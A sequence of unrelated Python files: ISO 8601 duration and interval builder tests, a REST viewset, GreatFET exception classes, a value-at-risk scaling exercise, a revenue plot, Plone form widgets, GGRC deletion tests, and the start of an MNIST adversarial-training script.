None, None, None, 'date'),
('00', '61', None, None, 'time'))
with self.assertRaises(MinutesOutOfBoundsError):
PythonTimeBuilder.build_datetime(('1981', '04', '05',
None, None, None, 'date'),
('00', '61', None,
(False, None, '00', '00',
'+00:00', 'timezone'), 'time'))
def test_build_duration(self):
testtuples = (({'PnY': '1', 'PnM': '2', 'PnD': '3',
'TnH': '4', 'TnM': '54', 'TnS': '6'},
datetime.timedelta(days=428, hours=4,
minutes=54, seconds=6)),
({'PnY': '1', 'PnM': '2', 'PnD': '3',
'TnH': '4', 'TnM': '54', 'TnS': '6.5'},
datetime.timedelta(days=428, hours=4,
minutes=54, seconds=6.5)),
({'PnY': '1', 'PnM': '2', 'PnD': '3'},
datetime.timedelta(days=428)),
({'PnY': '1', 'PnM': '2', 'PnD': '3.5'},
datetime.timedelta(days=428.5)),
({'TnH': '4', 'TnM': '54', 'TnS': '6.5'},
datetime.timedelta(hours=4, minutes=54, seconds=6.5)),
({'TnH': '1', 'TnM': '3', 'TnS': '11.858714'},
datetime.timedelta(hours=1, minutes=3,
seconds=11, microseconds=858714)),
({'TnH': '4', 'TnM': '54', 'TnS': '28.512400'},
datetime.timedelta(hours=4, minutes=54,
seconds=28, microseconds=512400)),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
#https://bitbucket.org/nielsenb/aniso8601/issues/21/sub-microsecond-precision-is-lost-when
({'PnY': '1999.9999999999999999'},
datetime.timedelta(days=729999, seconds=86399,
microseconds=999999)),
({'PnM': '1.9999999999999999'},
datetime.timedelta(days=59, hours=23,
minutes=59, seconds=59,
microseconds=999999)),
({'PnW': '1.9999999999999999'},
datetime.timedelta(days=13, hours=23,
minutes=59, seconds=59,
microseconds=999999)),
({'PnD': '1.9999999999999999'},
datetime.timedelta(days=1, hours=23,
minutes=59, seconds=59,
microseconds=999999)),
({'TnH': '14.9999999999999999'},
datetime.timedelta(hours=14, minutes=59,
seconds=59, microseconds=999999)),
({'TnM': '0.00000000999'}, datetime.timedelta(0)),
({'TnM': '0.0000000999'},
datetime.timedelta(microseconds=5)),
({'TnS': '0.0000001'}, datetime.timedelta(0)),
({'TnS': '2.0000048'},
datetime.timedelta(seconds=2, microseconds=4)),
({'PnY': '1'}, datetime.timedelta(days=365)),
({'PnY': '1.5'}, datetime.timedelta(days=547.5)),
({'PnM': '1'}, datetime.timedelta(days=30)),
({'PnM': '1.5'}, datetime.timedelta(days=45)),
({'PnW': '1'}, datetime.timedelta(days=7)),
({'PnW': '1.5'}, datetime.timedelta(days=10.5)),
({'PnD': '1'}, datetime.timedelta(days=1)),
({'PnD': '1.5'}, datetime.timedelta(days=1.5)),
({'PnY': '0003', 'PnM': '06', 'PnD': '04',
'TnH': '12', 'TnM': '30', 'TnS': '05'},
datetime.timedelta(days=1279, hours=12,
minutes=30, seconds=5)),
({'PnY': '0003', 'PnM': '06', 'PnD': '04',
'TnH': '12', 'TnM': '30', 'TnS': '05.5'},
datetime.timedelta(days=1279, hours=12,
minutes=30, seconds=5.5)),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
({'PnY': '0001', 'PnM': '02', 'PnD': '03',
'TnH': '14', 'TnM': '43', 'TnS': '59.9999997'},
datetime.timedelta(days=428, hours=14,
minutes=43, seconds=59,
microseconds=999999)),
#Verify overflows
({'TnH': '36'}, datetime.timedelta(days=1, hours=12)))
for testtuple in testtuples:
result = PythonTimeBuilder.build_duration(**testtuple[0])
self.assertEqual(result, testtuple[1])
def test_build_interval(self):
testtuples = (({'end': (('1981', '04', '05', None, None, None, 'date'),
('01', '01', '00', None, 'time'), 'datetime'),
'duration': (None, '1', None, None, None, None, None,
'duration')},
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1),
datetime.datetime(year=1981, month=3, day=6,
hour=1, minute=1)),
({'end': ('1981', '04', '05', None, None, None, 'date'),
'duration': (None, '1', None, None, None, None, None,
'duration')},
datetime.date(year=1981, month=4, day=5),
datetime.date(year=1981, month=3, day=6)),
({'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': ('1.5', None, None, None, None, None, None,
'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.datetime(year=2016, month=9, day=4,
hour=12)),
({'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '1', None, None,
'duration')},
datetime.date(year=2014, month=11, day=12),
datetime.datetime(year=2014, month=11, day=11,
hour=23)),
({'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '4', '54', '6.5',
'duration')},
datetime.date(year=2014, month=11, day=12),
datetime.datetime(year=2014, month=11, day=11,
hour=19, minute=5, second=53,
microsecond=500000)),
({'end': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'duration': (None, None, None,
None, '10', None, None, 'duration')},
datetime.datetime(year=2050, month=3, day=1,
hour=13,
tzinfo=UTCOffset(name='UTC',
minutes=0)),
datetime.datetime(year=2050, month=3, day=1,
hour=3,
tzinfo=UTCOffset(name='UTC',
minutes=0))),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
#https://bitbucket.org/nielsenb/aniso8601/issues/21/sub-microsecond-precision-is-lost-when
({'end': ('2000', '01', '01',
None, None, None, 'date'),
'duration': ('1999.9999999999999999', None, None,
None, None, None,
None, 'duration')},
datetime.date(year=2000, month=1, day=1),
datetime.datetime(year=1, month=4, day=30,
hour=0, minute=0, second=0,
microsecond=1)),
({'end': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, '1.9999999999999999', None,
None, None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1988, month=12, day=31,
hour=0, minute=0, second=0,
microsecond=1)),
({'end': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, None, '1.9999999999999999',
None, None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1989, month=2, day=15,
hour=0, minute=0, second=0,
microsecond=1)),
({'end': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, None, None,
'1.9999999999999999', None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1989, month=2, day=27,
hour=0, minute=0, second=0,
microsecond=1)),
({'end': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, '14.9999999999999999', None,
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2000, month=12, day=31,
hour=9, minute=0, second=0,
microsecond=1)),
({'end': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, '0.00000000999',
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2001, month=1, day=1)),
({'end': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, '0.0000000999',
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2000, month=12, day=31,
hour=23, minute=59, second=59,
microsecond=999995)),
({'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.datetime(year=2018, month=3, day=6)),
({'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.datetime(year=2018, month=3, day=5,
hour=23, minute=59, second=57,
microsecond=999996)),
({'start': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'duration': (None, '1', None,
'1', None, '1', None, 'duration')},
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1),
datetime.datetime(year=1981, month=5, day=6,
hour=1, minute=2)),
({'start': ('1981', '04', '05',
None, None, None, 'date'),
'duration': (None, '1', None,
'1', None, None, None, 'duration')},
datetime.date(year=1981, month=4, day=5),
datetime.date(year=1981, month=5, day=6)),
({'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, '2.5', None,
None, None, None, None, 'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.date(year=2018, month=5, day=20)),
({'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '1', None, None, 'duration')},
datetime.date(year=2014, month=11, day=12),
datetime.datetime(year=2014, month=11, day=12,
hour=1, minute=0)),
({'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '4', '54', '6.5', 'duration')},
datetime.date(year=2014, month=11, day=12),
datetime.datetime(year=2014, month=11, day=12,
hour=4, minute=54, second=6,
microsecond=500000)),
({'start': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'duration': (None, None, None,
None, '10', None, None, 'duration')},
datetime.datetime(year=2050, month=3, day=1,
hour=13,
tzinfo=UTCOffset(name='UTC',
minutes=0)),
datetime.datetime(year=2050, month=3, day=1,
hour=23,
tzinfo=UTCOffset(name='UTC',
minutes=0))),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
({'start': ('0001', '01', '01',
None, None, None, 'date'),
'duration': ('1999.9999999999999999', None, None,
None, None, None,
None, 'duration')},
datetime.date(year=1, month=1, day=1),
datetime.datetime(year=1999, month=9, day=3,
hour=23, minute=59, second=59,
microsecond=999999)),
({'start': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, '1.9999999999999999', None,
None, None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1989, month=4, day=29,
hour=23, minute=59, second=59,
microsecond=999999)),
({'start': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, None, '1.9999999999999999',
None, None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1989, month=3, day=14,
hour=23, minute=59, second=59,
microsecond=999999)),
({'start': ('1989', '03', '01',
None, None, None, 'date'),
'duration': (None, None, None,
'1.9999999999999999', None, None,
None, 'duration')},
datetime.date(year=1989, month=3, day=1),
datetime.datetime(year=1989, month=3, day=2,
hour=23, minute=59, second=59,
microsecond=999999)),
({'start': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, '14.9999999999999999', None,
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2001, month=1, day=1,
hour=14, minute=59, second=59,
microsecond=999999)),
({'start': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, '0.00000000999',
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2001, month=1, day=1)),
({'start': ('2001', '01', '01',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, '0.0000000999',
None, 'duration')},
datetime.date(year=2001, month=1, day=1),
datetime.datetime(year=2001, month=1, day=1,
hour=0, minute=0, second=0,
microsecond=5)),
({'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.datetime(year=2018, month=3, day=6)),
({'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')},
datetime.date(year=2018, month=3, day=6),
datetime.datetime(year=2018, month=3, day=6,
hour=0, minute=0, second=2,
microsecond=4)),
({'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')},
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1),
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1)),
({'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': ('1981', '04', '05',
None, None, None, 'date')},
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1),
datetime.date(year=1981, month=4, day=5)),
({'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')},
datetime.date(year=1980, month=3, day=5),
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1)),
({'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': ('1981', '04', '05',
None, None, None, 'date')},
datetime.date(year=1980, month=3, day=5),
datetime.date(year=1981, month=4, day=5)),
({'start': ('1981', '04', '05',
None, None, None, 'date'),
'end': ('1980', '03', '05',
None, None, None, 'date')},
datetime.date(year=1981, month=4, day=5),
datetime.date(year=1980, month=3, day=5)),
({'start': (('2050', '03', '01',
None, None, None, 'date'),
('13', '00', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime'),
'end': (('2050', '05', '11',
None, None, None, 'date'),
('15', '30', '00',
(False, True, None, None,
'Z', 'timezone'), 'time'), 'datetime')},
datetime.datetime(year=2050, month=3, day=1,
hour=13,
tzinfo=UTCOffset(name='UTC',
minutes=0)),
datetime.datetime(year=2050, month=5, day=11,
hour=15, minute=30,
tzinfo=UTCOffset(name='UTC',
minutes=0))),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
({'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00.0000001',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('14', '43', '59.9999997', None, 'time'),
'datetime')},
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1),
datetime.datetime(year=1981, month=4, day=5,
hour=14, minute=43, second=59,
microsecond=999999)))
for testtuple in testtuples:
result = PythonTimeBuilder.build_interval(**testtuple[0])
self.assertEqual(result[0], testtuple[1])
self.assertEqual(result[1], testtuple[2])
def test_build_repeating_interval(self):
args = {'Rnn': '3', 'interval': (('1981', '04', '05',
None, None, None, 'date'),
None,
(None, None, None,
'1', None, None,
None, 'duration'),
'interval')}
results = list(PythonTimeBuilder.build_repeating_interval(**args))
self.assertEqual(results[0], datetime.date(year=1981, month=4, day=5))
self.assertEqual(results[1], datetime.date(year=1981, month=4, day=6))
self.assertEqual(results[2], datetime.date(year=1981, month=4, day=7))
args = {'Rnn': '11', 'interval': (None,
(('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
(None, None, None,
None, '1', '2',
None, 'duration'),
'interval')}
results = list(PythonTimeBuilder.build_repeating_interval(**args))
for dateindex in compat.range(0, 11):
self.assertEqual(results[dateindex],
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1)
- dateindex * datetime.timedelta(hours=1,
minutes=2))
args = {'Rnn': '2', 'interval': ((('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
(('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
None,
'interval')}
results = list(PythonTimeBuilder.build_repeating_interval(**args))
self.assertEqual(results[0],
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1))
self.assertEqual(results[1],
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1))
args = {'Rnn': '2', 'interval': ((('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
(('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
None,
'interval')}
results = list(PythonTimeBuilder.build_repeating_interval(**args))
self.assertEqual(results[0],
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1))
self.assertEqual(results[1],
datetime.datetime(year=1981, month=4, day=5,
hour=1, minute=1))
args = {'R': True, 'interval': (None,
(('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
(None, None, None,
None, '1', '2', None, 'duration'),
'interval')}
resultgenerator = PythonTimeBuilder.build_repeating_interval(**args)
#Test the first 11 generated
for dateindex in compat.range(0, 11):
self.assertEqual(next(resultgenerator),
datetime.datetime(year=1980, month=3, day=5,
hour=1, minute=1)
- dateindex * datetime.timedelta(hours=1,
minutes=2))
def test_build_timezone(self):
testtuples = (({'Z': True, 'name': 'Z'},
datetime.timedelta(hours=0), 'UTC'),
({'negative': False, 'hh': '00', 'mm': '00',
'name': '+00:00'},
datetime.timedelta(hours=0), '+00:00'),
({'negative': False, 'hh': '01', 'mm': '00',
'name': '+01:00'},
datetime.timedelta(hours=1), '+01:00'),
({'negative': True, 'hh': '01', 'mm': '00',
'name': '-01:00'},
-datetime.timedelta(hours=1), '-01:00'),
({'negative': False, 'hh': '00', 'mm': '12',
'name': '+00:12'},
datetime.timedelta(minutes=12), '+00:12'),
({'negative': False, 'hh': '01', 'mm': '23',
'name': '+01:23'},
datetime.timedelta(hours=1, minutes=23), '+01:23'),
({'negative': True, 'hh': '01', 'mm': '23',
'name': '-01:23'},
-datetime.timedelta(hours=1, minutes=23), '-01:23'),
({'negative': False, 'hh': '00',
'name': '+00'},
datetime.timedelta(hours=0), '+00'),
({'negative': False, 'hh': '01',
'name': '+01'},
datetime.timedelta(hours=1), '+01'),
({'negative': True, 'hh': '01',
'name': '-01'},
-datetime.timedelta(hours=1), '-01'),
({'negative': False, 'hh': '12',
'name': '+12'},
datetime.timedelta(hours=12), '+12'),
({'negative': True, 'hh': '12',
'name': '-12'},
-datetime.timedelta(hours=12), '-12'))
for testtuple in testtuples:
result = PythonTimeBuilder.build_timezone(**testtuple[0])
self.assertEqual(result.utcoffset(None), testtuple[1])
self.assertEqual(result.tzname(None), testtuple[2])
def test_build_week_date(self):
weekdate = PythonTimeBuilder._build_week_date(2009, 1)
self.assertEqual(weekdate, datetime.date(year=2008, month=12, day=29))
weekdate = PythonTimeBuilder._build_week_date(2009, 53, isoday=7)
self.assertEqual(weekdate, datetime.date(year=2010, month=1, day=3))
def test_build_ordinal_date(self):
ordinaldate = PythonTimeBuilder._build_ordinal_date(1981, 95)
self.assertEqual(ordinaldate, datetime.date(year=1981, month=4, day=5))
def test_build_ordinal_date_bounds_checking(self):
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder._build_ordinal_date(1234, 0)
with self.assertRaises(DayOutOfBoundsError):
PythonTimeBuilder._build_ordinal_date(1234, 367)
def test_iso_year_start(self):
yearstart = PythonTimeBuilder._iso_year_start(2004)
self.assertEqual(yearstart, datetime.date(year=2003, month=12, day=29))
yearstart = PythonTimeBuilder._iso_year_start(2010)
self.assertEqual(yearstart, datetime.date(year=2010, month=1, day=4))
yearstart = PythonTimeBuilder._iso_year_start(2009)
self.assertEqual(yearstart, datetime.date(year=2008, month=12, day=29))
def test_date_generator(self):
startdate = datetime.date(year=2018, month=8, day=29)
timedelta = datetime.timedelta(days=1)
iterations = 10
generator = PythonTimeBuilder._date_generator(startdate,
timedelta,
iterations)
results = list(generator)
for dateindex in compat.range(0, 10):
self.assertEqual(results[dateindex],
datetime.date(year=2018, month=8, day=29)
+ dateindex * datetime.timedelta(days=1))
def test_date_generator_unbounded(self):
startdate = datetime.date(year=2018, month=8, day=29)
timedelta = datetime.timedelta(days=5)
generator = PythonTimeBuilder._date_generator_unbounded(startdate,
timedelta)
#Check the first 10 results
for dateindex in compat.range(0, 10):
self.assertEqual(next(generator),
datetime.date(year=2018, month=8, day=29)
+ dateindex * datetime.timedelta(days=5))
def test_split_to_microseconds(self):
result = PythonTimeBuilder._split_to_microseconds('1.1', int(1e6), 'dummy')
self.assertEqual(result, (1, 100000))
self.assertIsInstance(result[0], int)
self.assertIsInstance(result[1], int)
result = PythonTimeBuilder._split_to_microseconds('1.000001', int(1e6), 'dummy')
self.assertEqual(result, (1, 1))
self.assertIsInstance(result[0], int)
self.assertIsInstance(result[1], int)
result = PythonTimeBuilder._split_to_microseconds('1.0000001', int(1e6), 'dummy')
self.assertEqual(result, (1, 0))
self.assertIsInstance(result[0], int)
self.assertIsInstance(result[1], int)
def test_split_to_microseconds_exception(self):
with self.assertRaises(ISOFormatError) as e:
PythonTimeBuilder._split_to_microseconds('b.1', int(1e6), 'exception text')
self.assertEqual(str(e.exception), 'exception text')
with self.assertRaises(ISOFormatError) as e:
PythonTimeBuilder._split_to_microseconds('1.ad', int(1e6), 'exception text')
self.assertEqual(str(e.exception), 'exception text')
def test_distribute_microseconds(self):
self.assertEqual(PythonTimeBuilder._distribute_microseconds(1, (), ()), (1,))
self.assertEqual(PythonTimeBuilder._distribute_microseconds(11, (0,), (10,)), (1, 1))
self.assertEqual(PythonTimeBuilder._distribute_microseconds(211, (0, 0), (100, 10)), (2, 1, 1))
self.assertEqual(PythonTimeBuilder._distribute_microseconds(1, (), ()), (1,))
self.assertEqual(PythonTimeBuilder._distribute_microseconds(11, (5,), (10,)), (6, 1))
self.assertEqual(PythonTimeBuilder._distribute_microseconds(211, (10, 5), (100, 10)), (12, 6, 1))
|
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated
from unifier.apps.core.models import Platform
from unifier.apps.drf.v1.pagination import BasePagination
from unifier.apps.drf.v1.serializers import PlatformSerializer, PlatformSerializerDetail
class PlatformViewSet(viewsets.ReadOnlyModelViewSet):
queryset = Platform.objects.all().order_by("name")
serializer_class = PlatformSerializer
pagination_class = BasePagination
permission_classes = (IsAuthenticated,)
def get_serializer_class(self):
if self.action == "retrieve":
return PlatformSerializerDetail
return PlatformSerializer
|
#
# This file is part of GreatFET
#
class DeviceNotFoundError(IOError):
""" Error indicating no GreatFET device was found. """
pass
class DeviceBusyError(IOError):
""" Error indicating the GreatFET is too busy to service the given request. """
pass
class DeviceMemoryError(MemoryError):
""" Error indicating that the GreatFET has run out of memory. """
pass
class NotFoundError(IOError):
""" Error indicating that a resource was not found. """
pass
class GreatFETError(RuntimeError):
""" Runtime error used when no better description is available. """
pass
class ExternalDeviceError(IOError):
"""
Error used when a external device (e.g. not on the GreatFET)
experiences an issue. This typically means that the error is not wit
the GreatFET hardware or software, but may be with e.g. connections.
"""
GREATFET_ERRORS = {
-2: ValueError,
-5: NotFoundError,
-6: DeviceBusyError,
-7: MemoryError,
}
def from_greatfet_error(error_number):
"""
Returns the error class appropriate for the given GreatFET error.
"""
error_class = GREATFET_ERRORS.get(error_number, GreatFETError)
message = "Error {}".format(error_number)
return error_class(message)
|
""""
StockReturns_perc and var_95 from the previous exercise is available in your workspace. Use this data to estimate the VaR for the USO oil ETF for 1 to 100 days from now.
We've also defined a function plot_var_scale() that plots the VaR for 1 to 100 days from now.
""""
def plot_var_scale():
# Plot the forecased vs time
plt.plot(forecasted_values[:,0], -1*forecasted_values[:,1])
plt.xlabel('Time Horizon T+i')
plt.ylabel('Forecasted VaR 95 (%)')
plt.title('VaR 95 Scaled by Time', fontsize=18, fontweight='bold')
plt.show()
# Aggregate forecasted VaR
forecasted_values = np.empty([100, 2])
# Loop through each forecast period
for i in range(0, 100):
# Save the time horizon i
forecasted_values[i, 0] = i
# Save the forecasted VaR 95
forecasted_values[i, 1] = var_95*np.sqrt(i+1)
# Plot the results
plot_var_scale()
|
import matplotlib.pyplot as plt
import pandas as pd
data = pd.read_csv('../TTWO_Fin_Data.csv', header=0, index_col=0, on_bad_lines="skip").transpose()
gtarev = data['Approx. $ Revenue From GTA in Quarter (derived from two rows above)'].str.replace(',', '').astype(float)
nongtarev = data['Approx. $ Revenue From Non-GTA in Quarter (derived from three rows above)'].str.replace(',', '').astype(float)
gtarev.plot.line()
nongtarev.plot.line()
plt.title('GTA and Non-GTA revenues per quarter')
plt.legend(['GTA Revenues', 'Non-GTA revenues'])
plt.show() |
# -*- coding: utf-8 -*-
"""Module providing form utilities and partials"""
import uuid as uuid_tool
from Acquisition import aq_inner
from Products.Five import BrowserView
from plone import api
from plone.protect.utils import addTokenToUrl
class FormFieldBase(BrowserView):
""" Default widget view
Renders the provided template and view by the widget in question
"""
def __call__(self,
field_type='text-line',
field_identifier=None,
field_name=None,
field_help=None,
field_data=None,
field_error=None,
field_required=False,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_help': field_help,
'field_type': field_type,
'field_error': field_error,
'field_required': field_required,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def render(self):
return self.rendered_widget()
@property
def field_configuration(self):
return self.params['field_data']
def field_name(self):
translation_service = api.portal.get_tool(name="translation_service")
translated_name = translation_service.translate(
self.params['field_name'],
'lra.cos',
target_language=api.portal.get_default_language()
)
return translated_name
def field_css_class(self):
config = self.field_configuration
field_error = self.params['field_error']
base_class = "o-form__field"
class_list = [base_class, ]
modifiers = config["css_class_modifier"]
if self.params['field_type']:
modifiers.append(self.params['field_type'])
if self.params['field_type'] in ['boolean', 'privacy']:
modifiers.append('checkbox')
if self.params['field_required']:
modifiers.append("required")
if field_error and field_error['active'] is True:
modifiers.append("has-error")
for modifier in modifiers:
class_list.append(
"{0}--{1}".format(base_class, modifier)
)
return " ".join(class_list)
def field_data(self):
request_data = self.field_configuration
field_data = dict()
if request_data:
field_data = request_data
return field_data
def field_extra(self):
field_extra_data = dict()
for key, value in self.params.items():
if not key.startswith('field_'):
field_extra_data[key] = value
return field_extra_data
def rendered_widget(self):
context = aq_inner(self.context)
if self.params['field_type']:
view_name = '@@booking-form-field-{0}'.format(
self.params['field_type']
)
rendered_widget = context.restrictedTraverse(view_name)(
field_identifier=self.params['field_identifier'],
field_name=self.field_name(),
field_help_text=self.params['field_help'],
field_error=self.params['field_error'],
field_data=self.field_data(),
field_css_class=self.field_css_class(),
field_required=self.params['field_required'],
field_extra_data=self.field_extra()
)
else:
view_name = '@@booking-form-field-text'
rendered_widget = context.restrictedTraverse(view_name)(
field_identifier=self.params['field_identifier'],
field_name=self.field_name(),
field_help_text=self.params['field_help'],
field_data=self.field_data(),
field_css_class=self.field_css_class(),
field_required=self.params['field_required'],
field_extra_data=self.field_extra()
)
return rendered_widget
class FormFieldTextLine(BrowserView):
def __call__(self,
field_identifier=None,
field_name=None,
field_data=None,
field_error=None,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_error': field_error,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def settings(self):
return self.params
def render(self):
return self.index()
class FormFieldTextArea(BrowserView):
def __call__(self,
field_identifier=None,
field_name=None,
field_data=None,
field_error=None,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_error': field_error,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def settings(self):
return self.params
def render(self):
return self.index()
class FormFieldSelect(BrowserView):
def __call__(self,
field_identifier=None,
field_name=None,
field_data=None,
field_error=None,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_error': field_error,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def settings(self):
return self.params
def render(self):
return self.index()
def field_widget_options(self):
if self.settings()['field_extra_data']:
if 'widget_options' in self.settings()['field_extra_data']:
return self.settings()['field_extra_data']['widget_options']
return None
def widget_options(self):
translation_service = api.portal.get_tool(name="translation_service")
widget_options = dict()
options = self.field_widget_options()
for option_name, option_value in options.items():
widget_options[option_name] = translation_service.translate(
option_value,
'lra.cos',
target_language=api.portal.get_default_language()
)
return widget_options
class FormFieldBoolean(BrowserView):
def __call__(self,
field_identifier=None,
field_name=None,
field_data=None,
field_error=None,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_error': field_error,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def settings(self):
return self.params
def render(self):
return self.index()
class FormFieldPrivacy(BrowserView):
def __call__(self,
field_identifier=None,
field_name=None,
field_data=None,
field_error=None,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_error': field_error,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def settings(self):
return self.params
def render(self):
return self.index()
def widget_action_url(self):
action_url = "{portal_url}/{privacy_link}".format(
portal_url=api.portal.get().absolute_url(),
privacy_link=self.settings()['field_help_text']['help_text_link_url']
)
return addTokenToUrl(action_url)
|
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Test suite for DELETE requests."""
from integration.ggrc import TestCase
from integration.ggrc.query_helper import WithQueryApi
from integration.ggrc.models import factories
from integration.ggrc.api_helper import Api
from ggrc import db
from ggrc.models import all_models
class TestDelete(TestCase, WithQueryApi):
"""Test objects deletion."""
def setUp(self):
super(TestDelete, self).setUp()
self.client.get("/login")
self.api = Api()
def test_delete(self):
"""Deletion is synchronous and triggers compute_attributes."""
control = factories.ControlFactory()
result = self.api.delete(control)
controls = db.session.query(all_models.Control).all()
background_tasks = db.session.query(all_models.BackgroundTask).all()
self.assert200(result)
self.assertEqual(len(controls), 0)
self.assertEqual(len(background_tasks), 1)
self.assertTrue(background_tasks[0].name.startswith("compute_attributes"))
def test_delete_http400(self):
"""Deletion returns HTTP400 if BadRequest is raised."""
with factories.single_commit():
audit = factories.AuditFactory()
factories.AssessmentFactory(audit=audit)
result = self.api.delete(audit)
self.assert400(result)
self.assertEqual(result.json["message"],
"This request will break a mandatory relationship from "
"assessments to audits.")
|
from deeprobust.image.defense.pgdtraining import PGDtraining
from deeprobust.image.attack.pgd import PGD
import torch
from torchvision import datasets, transforms
from deeprobust.image.netmodels.CNN import Net
from deeprobust.image.config import defense_params
"""
LOAD DATASETS
"""
train_loader = torch.utils.data.DataLoader(
datasets.MNIST('deeprobust/image/defense/data', train=True, download=True,
transform=transforms.Compose([transforms.ToTensor()])),
batch_size=256,
shuffle=True)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST('deeprobust/image/defense/data', train=False,
transform=transforms.Compose([transforms.ToTensor()])),
batch_size=256,
shuffle=True)
"""
